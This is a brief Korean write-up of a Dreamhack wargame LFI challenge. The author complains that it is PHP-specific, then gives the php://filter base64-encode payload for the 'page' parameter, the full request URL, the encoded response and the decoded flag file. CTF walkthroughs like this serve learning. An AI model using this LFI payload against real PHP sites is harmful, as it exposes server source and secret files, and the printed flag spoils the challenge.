https://dreamhack.io/wargame/challenges/46

LFI 취약점

<aside> <img src="/icons/conversation_red.svg" alt="/icons/conversation_red.svg" width="40px" /> 이건 그냥 php 종속된 문제라 별로임. (누가 php 쓰나) 그냥 뭐 php wrapper 라는거랑 filter 기능 쓰는건데 너무 심할정도로 php 종속적임 시간아깝다

</aside>

아래 값을 page 변수에 넣으면 됨

php://filter/convert.base64-encode/resource=/var/www/uploads/flag

-> <http://host3.dreamhack.games:24232/?page=php://filter/convert.base64-encode/resource=/var/www/uploads/flag>

base64 인코딩된 값

PD9waHAKCSRmbGFnID0gJ0RIe2JiOWRiMWYzMDNjYWNmMGYzYzkxZTBhYmNhMTIyMWZmfSc7Cj8+CmNhbiB5b3Ugc2VlICRmbGFnPw==

디코더 돌리면

<?php
	$flag = 'DH{bb9db1f303cacf0f3c91e0abca1221ff}';
?>
can you see $flag?